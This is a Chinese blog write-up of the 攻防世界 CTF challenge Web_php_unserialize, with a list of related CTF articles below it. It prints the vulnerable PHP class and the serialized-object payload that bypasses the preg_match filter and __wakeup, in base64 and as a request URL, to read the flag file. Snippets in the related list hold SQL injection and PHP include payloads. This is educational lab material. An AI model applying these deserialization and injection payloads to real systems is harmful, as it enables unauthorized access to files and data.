攻防世界php2_攻防世界_Web_php_unserialize

最新推荐文章于 2022-07-01 22:48:44 发布
最新推荐文章于 2022-07-01 22:48:44 发布
阅读量133 收藏
点赞数
文章标签: 攻防世界php2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39886172/article/details/111515835
版权

预备知识点PHP中魔术方法前面都有两个”_“。

__construc()函数:php类中的构造函数,实例化类时自动执行。

__destruct()函数:php类中的析构函数,在到某个类对象的所有引用都被删除或者当对象被显式销毁时执行。

序列化serialize对象时,可以把对象里的属性和方法转换成连续的bytes数据,保存在一个文件里或者在网络上传输,当需要使用这个对象时,就可以反序列话unserialize这个字符串,得到这个对象,然后继续使用。

__wakeup() 在反序列化unserialize时,会检查是否存在__wakeup()方法,如果存在,则会调用__wakeup()方法,预先准备对象数据。

解题过程

访问靶机地址:

得到源代码:<?php

class Demo {

private $file = 'index.php';

public function __construct($file) {

$this->file = $file;

}

function __destruct() {

echo @highlight_file($this->file, true);

}

function __wakeup() {

if ($this->file != 'index.php') {

//the secret is in the fl4g.php

$this->file = 'index.php';

}

}

}

if (isset($_GET['var'])) {

$var = base64_decode($_GET['var']);

if (preg_match('/[oc]:\d+:/i', $var)) {

die('stop hacking!');

} else {

@unserialize($var);

}

} else {

highlight_file("index.php");

}

?>

分析:

首先看到题目是Web_php_unserialize知道这是一道反序列化题目,

Demo类中可以改变变量$file的值,

又看到一行注释//the secret is in the fl4g.php

得知我们需要访问fl4g.php

Demo类中的析构函数又可以显示出文件内容function __destruct() {

//高亮显示file所指向的文件的内容

echo @highlight_file($this->file, true);

}

可以基本推断出解题思路。

思路:preg_match()匹配绕过

unserialize()反序列化执行__wakeup()的绕过

步骤:将下面的类序列化class Demo {

private $file = 'fl4g.php';

}

得到结果O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}将`O:4改为O:+4:绕过preg_match()

将"Demo":1改为"Demo":2:绕过__wakeup()当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。

所以为了绕过__wakeup(),我们将1改为任意大于1的都行

得到最终结果:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

提交var参数:http://IP:port/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

获得flag:<?php

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";

?>

weixin_39886172
关注
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3852
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 716
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
攻防世界php2_攻防世界 WEB Web_php_unserialize
weixin_39649490的博客
12-19 194
0x00 - 题目描述PHP 反序列,老题新做了。打开 index.php 是这样的0x01 - 解题过程先审计一下代码,执行过程是从 17 行开始。123456789101112131415161718192021222324252627...
攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密
z2560088的博客
10-10 1311
来自攻防世界的一道web进阶题,名为Web_php_unserialize 题目给出了一段php代码,应该是后台的部分源码: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..
攻防世界web高手进阶区 Web_php_unserialize
weixin_61835841的博客
04-20 952
有错请各位大佬指正 文章目录 工具 分析 操作 工具 1.火狐 2.phpstudy 分析 本题主要考察的知识点: 1.__construct():当对象创建(new)时会自动调用。将传入的 $file 赋值给本地的私有方法 $file 2.unserialize() 时是不会自动调用的。(构造函数) 3.__destruct():当对象被销毁时会自动调用。(析构函数) 4.__wakeup():unserialize() 时.
PHP反序列化+代码审计-xctf-Web_php_unserialize
qq_43660551的博客
07-01 858
php反序列化+代码审计
攻防世界-Web-Exercise-Wirteup
08-08 414
攻防世界Web题进阶区题目部分记录。前面题型比较基础,仅记录较为典型的题目用于以后知识点的回顾。 目录 Web_php_unserialize Web_php_unserialize 题目描述: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function _
攻防世界web_php_unserialize
最新发布
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...
攻防世界-Web进阶篇-006Web_php_unserialize
gyy990526的博客
03-14 2007
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
攻防世界:反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 534
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6359
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5818
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
20201229攻防世界WEB高手区题目一题多解全教程通关(1-6)
qq_45290991的博客
01-08 747
001baby_web 002Trainng WWW Robots 有关robots.txt的知识可以参考:https://www.cnblogs.com/yuzhongwusan/archive/2008/12/06/1348969.html 打开robots.txt会发现它只允许俄罗斯最大的搜索引擎爬取他的flag: 我们打开BP把自己的USER-agent改为Yandex就好了: 然后访问fl0g.php就会发现我们需要的flag:cyberpeace{3084111b0
iscc-2022
zhhhb1005的博客
06-05 1058
分析题目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
【BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5890
Web类题目
攻防世界 web部分题目
weixin_51441054的博客
05-09 537
目录 web_php_include php2 unserialize php_rce web_php_unserialize web_php_include data:// 数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。 1、data://text/plain, http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?> 2、data://text/plain;b
CTF做题笔记11
Forever_Han13的博客
04-07 481
[HCTF 2018]admin import sys import zlib from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) d
攻防世界 web 进阶题 001-012
Sk1y的博客
11-28 1399
01 baby_web 题目: 方法一: 访问index.php,同时burp抓包,发给repeater分析,go,查看响应头,会得到flag。方法二: 火狐浏览器,访问index.php,按F12,在网络部分中,响应头里有flag。收获:项目入口文件index.php.index.php文件是一个php网站首页文件,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx。(取材于某度) 02 Training-WWW-Robots 题目:打开会.
攻防世界——Web_php_unserialize
Wking
09-03 140
1.代码审计 发现必须构造Demo传入fl4g.php才能得到flag 同时要绕过匹配和反序列化的函数 2.构造绕过 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值